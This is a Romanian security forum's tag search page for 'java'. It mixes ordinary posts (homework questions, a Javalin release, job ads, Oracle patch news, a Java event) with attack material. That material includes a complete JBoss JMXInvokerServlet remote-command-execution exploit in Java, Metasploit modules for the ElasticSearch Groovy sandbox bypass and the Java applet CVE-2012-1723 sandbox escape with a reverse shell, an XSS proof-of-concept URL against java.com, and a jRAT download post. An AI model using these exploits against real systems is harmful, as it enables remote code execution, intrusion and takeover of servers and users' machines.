Jump to content

Search the Community

Showing results for tags 'java'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 21 results

  1. Buna! Sunt studenta la ASE si as avea nevoie de ajutor pentru a realiza un proiect in limbajul Java contra-cost.Multumesc
  2. Buna ziua! Imi cer scuze ca nu am mai postat de ceva vreme. Recent, m-am intalnit cu o problema. De 2-3 luni incerc sa finalizez un proiect, dar inca nu am reusit. Mi-a ramas partea de codare, respectiv codare, decodare Tornado care trebuie realizata in java sau matlab. Mai jos aveți partea de teorie care am primit o. Curs Un exemplu sau codul in sine ar fi de mare ajutor. Mulțumesc anticipat.
  3. Introducing Javalin Javalin is a very lightweight web framework for Kotlin and Java, inspired by Sparkjava and koa.js. Javalin is written in Kotlin with a few functional interfaces written in Java. This was necessary to provide an enjoyable and near identical experience for both Kotlin and Java developers. Java quickstart Add dependency (maven) <dependency> <groupId>io.javalin</groupId> <artifactId>javalin</artifactId> <version>1.0.0</version> </dependency> Start programming import io.javalin.Javalin; public class HelloWorld { public static void main(String[] args) { Javalin app = Javalin.start(7000); app.get("/", ctx -> ctx.result("Hello World")); } } Kotlin quickstart Add dependency (gradle) compile 'io.javalin:javalin:1.0.0' Start programming import io.javalin.Javalin fun main(args: Array<String>) { val app = Javalin.start(7000) app.get("/") { ctx -> ctx.result("Hello World") } } Special thanks: Blake Mizerany, for creating Sinatra Per Wendel, for creating Spark Christian Rasmussen, for being a great guy Per Kristian Kummermo, also for being a great guy Download: javalin-master.zip or git clone https://github.com/tipsy/javalin.git Sources: https://javalin.io/news/javalin-1.0.0-stable.html https://github.com/tipsy/javalin
  4. buna poate ma lamureste si pe mine cineva cu se poate exploata vulnerabilitatea in jquery version 1.11.2 nu ma prea pricep prea bine la java si nu imi dau seama am tot citit pe google tot felul de articole dar le prea inteleg sau daca exista vreo aplicatie care o verifica automat daca este vulnerabil sa nu
  5. salut, am urmatoarea bucata de cod Java pe care nu stiu daca o inteleg perfect si ca sa fie si mai rau am nevoie sa scriu ceva cu aceeasi functionalitate in Python: "rs", "CEVA" si "ALTCEVA" sunt niste variabile care vin de mai sus din script.... Inflater inflater = new Inflater(); byte[] result = new byte[rs.getInt("CEVA")]; inflater.setInput(rs.getBytes("ALTCEVA")); int length = inflater.inflate(result); System.out.println(new String(result, 0, length, "UTF-8")); System.out.println(); System.out.println("-----"); System.out.println(); inflater.end(); aveti idee cum pot scrie ceva cu aceeasi functionalitate in Python? exista vreo librarie in Pyton care face ce face acel Inflater in Java? (am cautat pe net si am vazut raspunsurile de pe stackoverflow dar probabil sunt prea prost sa le inteleg) ma poate ajuta cineva cu un exemplu ceva in Python despre cum as putea realiza asta? multumesc,
  6. Vazand sutele de site-uri de torrente care se inchid am realizat o aplicatie in Java care imita platforma TBDEV cu scopul de a inlocui site-urile web de torrente. Scoupul principal a fost sa invat Java, aplicatia fiind un practice bun deoarece utilizeaza cat mai multe functii. Aplicatia este doar pentru PC-uri, nu poate fi rulata in browser, am creat-o primavara aceasta, dar am abandonat-o din lipsa de timp. As vrea sa stiu daca se merita sa o continui, daca se merita sa o fac open-source si daca sunt pe forum oameni care doresc sa colaboreze pentru a o termini si imbunatati. Inainte sa veniti cu comentarii rautacioase, vreau sa specific ca designul aplicatiei apartine celor de la iPlay.ro, un site de torrente romanesc care din pacate nu mai exista, am incercat sa contactez administratorii acelui site pentru a le cere acordul de a le folosi designul, dar nu am putut sa dau de ei. Mai jos aveti cateva printscreen-uri ale aplicatiei: All images: https://s17.postimg.org/9cr92h9xr/Screen_Shot_2016_08_12_at_9_10_43_PM.png https://s17.postimg.org/hwan08ia7/Screen_Shot_2016_08_12_at_9_10_49_PM.png https://s17.postimg.org/aucpe1eof/Screen_Shot_2016_08_12_at_9_10_52_PM.png https://s17.postimg.org/6mhx5ad8v/Screen_Shot_2016_08_12_at_9_11_00_PM.png https://s17.postimg.org/cby5pljf3/Screen_Shot_2016_08_12_at_9_11_22_PM.png https://s17.postimg.org/71t6yaz67/Screen_Shot_2016_08_12_at_9_11_27_PM.png https://s17.postimg.org/4yirqmzdb/Screen_Shot_2016_08_12_at_9_11_35_PM.png https://s17.postimg.org/fzii9egzz/Screen_Shot_2016_08_12_at_9_16_56_PM.png https://s17.postimg.org/7vae4nukv/Screen_Shot_2016_08_12_at_9_17_06_PM.png https://s17.postimg.org/9odaszfrj/Screen_Shot_2016_08_12_at_9_17_14_PM.png https://s17.postimg.org/41gxvid8v/Screen_Shot_2016_08_12_at_9_17_27_PM.png https://s17.postimg.org/9qx6ftjf3/Screen_Shot_2016_08_12_at_9_17_35_PM.png https://s17.postimg.org/q5r3se1e7/Screen_Shot_2016_08_12_at_9_18_03_PM.png
  7. Programatori C# si Java pentru Dell. De asemenea Oracle dba, dev (tot pentru Dell). Trimiteti PM pentru emailul de contact.
  8. jRAT v5 Java Remote Administration Download: DepositFiles
  9. Adica pentru a-l putea folosi ce iti trebuie instalat pe pc meu(cumva instalat Java?) Am vazut un tutorial pe google cum functioneaza dar nu am gasit ce iti trebuie pentru a te intesta
  10. Hello I want a way to make Auto Infect java Answer Thanks?
  11. Dear members, First of all, apologies if this is posted in the wrong section We are urgently looking for highly professional web security analysts who wish to work by contract in our security company. You need to have a comprehensive knowledge in researching exploitation of web security (eg. php, java etc). If you wish to apply to this project, please provide us your CV. Also companies can apply if they have staff who can work with us locally. Regards, M.
  12. ###################################################################### # Exploit Title: Java.com RXSS and DOM-XSS # Date: 01/04/2015 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: java.com: Java + You # Version: / # Category: Reflected Cross Site Scripting and DOM based XSS # Google dork: # Tested on: Java.com main domain ###################################################################### Java description : ====================================================================== As of 2015, Java is one of the most popular programming languages in use, particularly for client-server web applications, with a reported 9 million developers. Java was originally developed by James Gosling at Sun Microsystems (which has since been acquired by Oracle Corporation) and released in 1995 as a core component of Sun Microsystems' Java platform. The language derives much of its syntax from C and C++, but it has fewer low-level facilities than either of them. Java.com is the main website to acquire Java JRE or JDK software. RXSS Vulnerability description - PoC n°1 : ====================================================================== A reflected XSS is available in the java.com main domain. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Java portals, or capture Java's users credentials such cookies. It's also possible to forge a fake Java's page with this XSS to provide a backdoored version of softwares to users. This reflected XSS is on GET "n" variable and is not properly sanitized before being used to his page. Tested on Firefox 32.0. PoC: https://www.java.com/fr/download/faq/index_general.xml?n=20">2</a><script>alert(/Yann CAM @asafety_www.synetis.com/);</script>?printFriendly=true Screenshots : ====================================================================== - http://www.asafety.fr/data/20141025-java.com_DOMXSS-01.png - http://www.asafety.fr/data/20141025-java.com_DOMXSS-02.png - http://www.asafety.fr/data/20141025-java.com_DOMXSS-03.png - http://www.asafety.fr/data/20141025-java.com_Reflected_XSS-01.png - http://www.asafety.fr/data/20141025-java.com_Reflected_XSS-02.png Solution: ====================================================================== Fixed by Oracle/Java Security Team. Additional resources : ====================================================================== - http://www.java.com/ - http://www.oracle.com/ - http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html - http://www.asafety.fr/actualites-news/contribution-java-com-dom-xss-reflected-xss - http://www.synetis.com Report timeline : ====================================================================== 2014-10-25 : Oracle/Java Team alerted with details and PoC. 2014-10-27 : Oracle/Java response and confirm vulnerabilities. 2014-12-23 : Vulnerabilities seems to be fixed. 2015-04-01 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: www.synetis.com | www.asafety.fr Source: http://packetstorm.wowhacker.com/1504-exploits/javacom-xss.txt
  13. /* * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...). * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation" * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console" * and the "JMX Console" are protected or disabled. * * [FAQ] * * Q: Is my target vulnerable? * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable * * Q: How to fix it? * A: Enable authentication in "jmx-invoker-service.xml" * * Q: Is this exploit version-dependent? * A: Unfortunately, yes. An hash value is used to properly invoke a method. * At least comparing version 4.x and 5.x, these hashes are different. * * Q: How to compile and launch it? * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker * Yes, it's a Java exploit. I can already see some of you complaining.... */ import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.ObjectOutputStream; import java.lang.reflect.Array; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.net.ConnectException; import java.net.HttpURLConnection; import java.net.URL; import javax.management.MalformedObjectNameException; import javax.management.ObjectName; import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir) public class JMXInvokerServlet { //---------> CHANGE ME <--------- static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1 static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet"; static final String cmd = "touch /tmp/exectest"; //------------------------------- public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException { System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]"); //Create a malicious Java serialized object MarshalledInvocation payload = new MarshalledInvocation(); payload.setObjectName(new Integer(hash)); //Executes the MBean invoke operation Class<?> c = Class.forName("javax.management.MBeanServerConnection"); Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class); payload.setMethod(method); //Define MBean's name, operation and pars Object myObj[] = new Object[4]; //MBean object name myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer"); //Operation name myObj[1] = new String("createScriptDeployment"); //Actual parameters myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"}; //Operation signature myObj[3] = new String[]{"java.lang.String", "java.lang.String"}; payload.setArguments(myObj); System.out.println("\n--[*] MarshalledInvocation object created"); //For debugging - visualize the raw object //System.out.println(dump(payload)); //Serialize the object try { //Send the payload URL server = new URL(url); HttpURLConnection conn = (HttpURLConnection) server.openConnection(); conn.setRequestMethod("POST"); conn.setDoOutput(true); conn.setDoInput(true); conn.setUseCaches(false); conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"); conn.setRequestProperty("Connection", "keep-alive"); conn.setRequestProperty("User-Agent", "Java/1.6.0_06"); conn.setRequestProperty("Content-Type", "application/octet-stream"); conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate"); conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"); ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream()); wr.writeObject(payload); System.out.println("\n--[*] MarshalledInvocation object serialized"); System.out.println("\n--[*] Sending payload..."); wr.flush(); wr.close(); //Get the response InputStream is = conn.getInputStream(); BufferedReader rd = new BufferedReader(new InputStreamReader(is)); String line; StringBuffer response = new StringBuffer(); while ((line = rd.readLine()) != null) { response.append(line); } rd.close(); if (response.indexOf("Script Name") != -1) { System.out.println("\n--[*] \"" + cmd + "\" successfully executed"); } else { System.out.println("\n--[!] An invocation error occured..."); } } catch (ConnectException cex) { System.out.println("\n--[!] A connection error occured..."); } catch (IOException ex) { ex.printStackTrace(); } } /* * Raw dump of generic Java Objects */ static String dump(Object o) { StringBuffer buffer = new StringBuffer(); Class oClass = o.getClass(); if (oClass.isArray()) { buffer.append("["); for (int i = 0; i < Array.getLength(o); i++) { if (i > 0) { buffer.append(",\n"); } Object value = Array.get(o, i); buffer.append(value.getClass().isArray() ? dump(value) : value); } buffer.append("]"); } else { buffer.append("{"); while (oClass != null) { Field[] fields = oClass.getDeclaredFields(); for (int i = 0; i < fields.length; i++) { if (buffer.length() > 1) { buffer.append(",\n"); } fields[i].setAccessible(true); buffer.append(fields[i].getName()); buffer.append("="); try { Object value = fields[i].get(o); if (value != null) { buffer.append(value.getClass().isArray() ? dump(value) : value); } } catch (IllegalAccessException e) { } } oClass = oClass.getSuperclass(); } buffer.append("}"); } return buffer.toString(); } } Source
  14. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ElasticSearch Search Groovy Sandbox Bypass', 'Description' => %q{ This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the REST API, which does not require authentication, where the search function allows groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName to reference arbitrary classes. It can be used to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04. }, 'Author' => [ 'Cameron Morris', # Vulnerability discovery 'Darren Martyn', # Public Exploit 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-1427'], ['URL', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/'], ['URL', 'https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch'], ['URL', 'http://drops.wooyun.org/papers/5107'] ], 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ ['ElasticSearch 1.4.2', {}] ], 'DisclosureDate' => 'Feb 11 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(9200), OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"]) ], self.class) end def check result = Exploit::CheckCode::Safe if vulnerable? result = Exploit::CheckCode::Vulnerable end result end def exploit print_status("#{peer} - Checking vulnerability...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end print_status("#{peer} - Discovering TEMP path...") res = execute(java_tmp_dir) tmp_dir = parse_result(res) if tmp_dir.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else print_good("#{peer} - TEMP path on '#{tmp_dir}'") end print_status("#{peer} - Discovering remote OS...") res = execute(java_os) os = parse_result(res) if os.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else print_good("#{peer} - Remote OS is '#{os}'") end if os =~ /win/i tmp_file = "#{tmp_dir}#{rand_text_alpha(4 + rand(4))}.jar" else tmp_file = File.join(tmp_dir, "#{rand_text_alpha(4 + rand(4))}.jar") end register_files_for_cleanup(tmp_file) print_status("#{peer} - Trying to load metasploit payload...") java = java_load_class(os, tmp_file) execute(java) end def vulnerable? java = 'java.lang.Math.class.forName("java.lang.Runtime")' vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...") res = execute(java) result = parse_result(res) if result.nil? vprint_status("#{peer} - no response to test") return false elsif result == 'class java.lang.Runtime' return true end false end def parse_result(res) unless res vprint_error("#{peer} - No response") return nil end unless res.code == 200 && res.body vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") return nil end begin json = JSON.parse(res.body.to_s) rescue JSON::ParserError return nil end begin result = json['hits']['hits'][0]['fields']['msf_result'] rescue return nil end result.is_a?(::Array) ? result.first : result end def java_tmp_dir 'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")' end def java_os 'java.lang.Math.class.forName("java.lang.System").getProperty("os.name")' end def java_load_class(os, tmp_file) if os =~ /win/i tmp_file.gsub!(/\\/, '\\\\\\\\') end java = [ 'c=java.lang.Math.class.forName("java.io.FileOutputStream");', 'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");', "i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");", 'b64_i=b64.newInstance();', "i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));", 'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");', 'file_class=java.lang.Math.class.forName("java.io.File");', "file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();", 'loader=loader_class.newInstance();', 'loader.addURL(file_url);', 'm=loader.loadClass(\'metasploit.Payload\');', 'm.main(null);' ] java.join end def execute(java, timeout = 20) payload = { "size" => 1, "query" => { "filtered" => { "query" => { "match_all" => {} } } }, "script_fields" => { "msf_result" => { "script" => java } } } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "_search"), 'method' => 'POST', 'data' => JSON.generate(payload) }, timeout) res end end Source
  15. Features: BETA 1 is released! Requirements: Java 8 (for now) Do not click here.
  16. Oracle’s first Critical Patch Update of the year arrived Tuesday with its usual volume, and some disturbing fanfare. Oracle admins today are staring at 169 patches on their collective plates across the company’s product line. One of the more pressing fixes is for a an issue in the Oracle E-Business Suite, a bundle of applications that includes CRM, financial, supply chain and project management software. Noted Oracle bug-hunter David Litchfield last June 11 alerted Oracle to a serious flaw that he said behaved like a backdoor, though he told Threatpost he did not believe it was an intentional backdoor such as one implanted by law enforcement or government. “Maybe, though, giving them the benefit [of the] doubt, it could be that some [developer] was testing something and they forgot to turn it off. Who knows? What is concerning however is that Oracle seem not to know who and why this privilege was granted, either,” Litchfield said via email. Litchfield released some details on the vulnerability, CVE-2015-0393, yesterday, explaining that the PUBLIC role in the database is granted INDEX privileges on the SYS table. This allows anyone to create an index in this particular table, Litchfield said. “By creating a function-based index an attacker can execute arbitrary SQL as the SYS user thus fully compromising the database server,” Litchfield said. “Anyone with a vulnerable eBusiness suite web server connected to the internet is potentially exposed to this as it is possible to chain multiple vulnerabilities to exploit this without a username and password.” Litchfield said there is no reason for PUBLIC to have INDEX privileges on the DUAL table, leading him to speculate that it’s either an intentional backdoor, or a result of poor coding. “My first thought was that this had possibly been left as a backdoor (because it can be trivially exploited to gain SYSDBA privileges) and was an indication that the database server had been compromised,” said Litchfield, who discovered the issue during a client engagement. “I communicated my fears to the client and they began an investigation to determine when the privilege had been granted and by who to ascertain the why. It turns out that no one had—this privilege is granted as part of a seeded install of Oracle eBusiness suite.” Litchfield confirmed that Oracle told him that its engineers looked at the bug and said there was “no indication of when or why the grants were originally added.” Oracle said in its CPU advisory that the vulnerability is not remotely exploitable and merited a criticality rating of 6.0 out of 10. “This has been addressed.” -Oracle spokesperson When asked for a comment, an Oracle representative sent Threatpost a link to the January Critical Patch Update and said: “This has been addressed,” referring to the Litchfield vulnerability. Oracle also announced that it was disabling the use of SSL 3.0, calling it an “obsolete protocol” that was only aggravated by the POODLE fallback vulnerability. Attacks against POODLE allow an attacker to take advantage of the fact that when a secure connection attempt fails, under some circumstances the Web server will fall back to an older protocol and try to renegotiate the secure connection. If the server supports SSLv3, an old protocol, and the attacker can force the failed connection attempt, the attacker can then execute a padding oracle attack against the server and eventually decrypt the contents of the secure connection. The company went a step further to recommend disabling SSL altogether in favor of TLS 1.2. “They should also expect that all versions of SSL be disabled in all Oracle software moving forward. A manual configuration change can allow Java SE clients and server endpoints, which have been updated with this Critical Patch Update, to continue to temporarily use SSL v3.0,” said Eric Maurice, Oracle software security assurance director. “However, Oracle strongly recommends organizations to phase out their use of SSL v3.0 as soon as possible.” As for Java, Oracle patched 19 vulnerabilities in the platform, 14 of those remotely exploitable, including a half-dozen rating either 9.3 or 10, the highest score on Oracle’s risk matrix. Four client-side vulnerabilities rated a 10, however, Oracle said the number of overall Java bugs continues to decline. In its last CPU, for example, Oracle patched 25 Java flaws, and last April it patched 37. “This relatively low historical number for Oracle Java SE fixes reflect the results of Oracle’s strategy for addressing security bugs affecting Java clients and improving security development practices in the Java development organization,” Maurice said. Oracle, meanwhile patched eight vulnerabilities in its flagship Oracle Database Server, none of them remotely exploitable, and none applicable to client-only installations. The only other highly critical bugs, scoring 10.0, were found in Oracle Sun Systems Fujitsu M10-1, M10-4 and M10-4S servers. Source
  17. Salut cum am spus si in topicul trecut cel cu Delagation in java https://rstforums.com/forum/87471-delegation-java.rst invat dupa cartea Thinking in Java si am intampinat cateva probleme la acesta chestie. Am urmatorul exercitiu de facut din carte Modify Detergent.java so that it uses delegation aceasta este clasa Detergent.java class Cleanser {private String s = "Cleanser"; public void append(String a) { s += a; } public void dilute() { append(" dilute()"); } public void apply() { append(" apply()"); } public void scrub() { append(" scrub()"); } public String toString() { return s; } public static void main(String[] args) { Cleanser x = new Cleanser(); x.dilute(); x.apply(); x.scrub(); print(x); } } public class Detergent extends Cleanser { // Change a method: public void scrub() { append(" Detergent.scrub()"); super.scrub(); // Call base-class version } // Add methods to the interface: public void foam() { append(" foam()"); } // Test the new class: public static void main(String[] args) { Detergent x = new Detergent(); x.dilute(); x.apply(); x.scrub(); x.foam(); print(x); print("Testing base class:"); Cleanser.main(args); } } si acesta este rezolvare mea class Cleanser1{ private String s="Cleanser"; public void append(String a) {s+=a; } public void dilute() {append("dilute()") ;} public void apply(){append("apply()");} public void scrub(){append("scrub()"); } public String toString(){ return s; } } public class Detergent1 { Cleanser1 x=new Cleanser1(); public void append(String s) {x.append(s);} public void dilute() {x.append("dilute");} public void apply(){ x.append("apply()"); } public void scrub() { x.append("Aply()"); } public void foam(){ x.append("Foam()"); } public String toString(){ return x.toString(); } public static void main(String args[]) { Detergent x=new Detergent(); x.apply(); print(x); } } am cautat pe net rezolvarea exercitiului si am gasit asta http://greggordon.org/java/tij4/reusing/DetergentDelegation.java nu inteleg de ce tipu spune ca anumite metode erau delegate in totalitate si altele nu si de ce a suprascris metoda append in clasa Detergent deoarece in exemplu din carte acesta mostenea toatea metodele si rescria doar 2 din ele scrub si apply . Edit:Am gasit ghidul cu solutii al cartii care este realizat chiar de autor si a rezolvat acest exercitiu exact ca mine. PS:M2G mi-a spus sa fac acest topic "Intrebari Java" si cand am probleme sa postez aici in acest mod nu fac 100 de topicuri pentru toate probleme din carte .
  18. Despre: "Join the most important event dedicated to the Java community in Romania, organized by Oracle in collaboration with Bucharest Java User Group and Java partners. Discover how Java can increase your developer productivity so you can build the next generation of advanced applications that power the world. Java is the foundation for virtually every type of networked application and is the global standard for developing and delivering mobile applications, games, Web-based content, and enterprise software. With more than 9 million developers worldwide, Java enables you to efficiently develop and deploy exciting applications and services. With comprehensive tooling, a mature ecosystem, and robust performance, Java delivers applications portability across even the most disparate computing environments. The Java EE platform offers enterprise developers the opportunity to deliver today’s Web applications with the greatest efficiency, flexibility, and ease of development. After 13 years offering business critical applications for thousands of companies, Java EE remains ahead of the pack as an enterprise application and deployment platform. As the industry standard for enterprise computing, Java EE enables developers to take advantage of the emerging usages, patterns, frameworks, and technologies of the enterprise space. Developing enterprise applications has never been easier. Register online now for this FREE event." Agenda: Part 1 (15:00 - 18:30) 15:00 - 15:30 Registration & Welcome coffee 15:30 - 16:15 Keynote: Java Enterprise Edition - State of the Union ; Speaker: David Delabassee, Java Principal Product Manager, Oracle 16:15 - 16:45 Romanian Java User Groups Community Perspective BJUG after 1+ years ; Speaker: Ioan Eugen Stan, Co-Founder, Bucharest Java User Group (BJUG) 16:45 - 17:00 Coffee Break 17:00 - 17:30 Web controlled Raspberry Pi Car using Java ; Speaker: Bogdan Craciun, Software Architect SIVECO Romania 17:30 - 18:00 Large scale enterprise application development with the Java EE technology stack ; Speaker: Marius Harpau, Java Architect Endava 18:00 - 18:30 “Weblogic 12c - What's new?” “Productivity in the Cloud with Oracle Application Development Framework (ADF) 18:30 - 19:00 Social Break - Refreshments Part 2 (19:00 - 21:00) Monthly Bucharest JUG Event Edition #15 - JUG Bucure?ti - Pagina Principal? 19:00 - 20:00 Java EE 7 overview ;Speaker: David Delabassee, Java Principal Product Manager, Oracle 20:00 - 21:00 The Future starts with a Promise ; Speaker: Alexandru Nedelcu, Software Engineer / Tech Lead at Epigrams Data si ora: Aug 29, 2013 03:00 PM - 09:00 PM ; Locatia: AFI Cotroceni – Cinema City BD. Vasile Milea 4 Bucharest Romania -- Daca nu ati citit tot, evenimentul este "Free", va puteti inregistra aici.
  19. This Metasploit module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet Field Bytecode Verifier Cache Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, 'License' => MSF_LICENSE, 'Author' => [ 'Stefan Cornellius', # Discoverer 'mihi', # Vuln analysis 'littlelightlittlefire', # metasploit module 'juan vazquez', # merged code (overlapped) 'sinn3r' # merged code (overlapped) ], 'References' => [ ['CVE', '2012-1723'], ['OSVDB', '82877'], ['BID', '52161'], ['URL', 'http://schierlm.users.sourceforge.net/CVE-2012-1723.html'], ['URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=829373'], ['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/253e7c32def9'], ['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/8f86ad60699b'] ], 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86 } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 06 2012' )) end def exploit # load the static jar file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1723.jar" ) fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close super end def on_request_uri( cli, request ) data = "" host = "" port = "" if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status("Sending #{self.name}") payload = regenerate_payload( cli ) if not payload print_error("Failed to generate the payload." ) return end if target.name == 'Generic (Java Payload)' if datastore['LHOST'] jar = payload.encoded host = datastore['LHOST'] port = datastore['LPORT'] vprint_status("Sending java reverse shell") else port = datastore['LPORT'] datastore['RHOST'] = cli.peerhost vprint_status( "Java bind shell" ) end if jar print_status( "Generated jar to drop (#{jar.length} bytes)." ) jar = Rex::Text.to_hex( jar, prefix="" ) else print_error("Failed to generate the executable." ) return end else # NOTE: The EXE mixin automagically handles detection of arch/platform data = generate_payload_exe if data print_status("Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) else print_error("Failed to generate the executable." ) return end end send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) return end print_status("Sending jar") send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html( data, jar, host, port ) jar_name = rand_text_alpha(rand(6)+3) + ".jar" html = "<html><head></head>" html += "<body>" html += "<applet archive=\"#{jar_name}\" code=\"cve1723.Attacker\" width=\"1\" height=\"1\">" html += "<param name=\"data\" value=\"#{data}\"/>" if data html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar html += "<param name=\"lhost\" value=\"#{host}\"/>" if host html += "</applet></body></html>" return html end 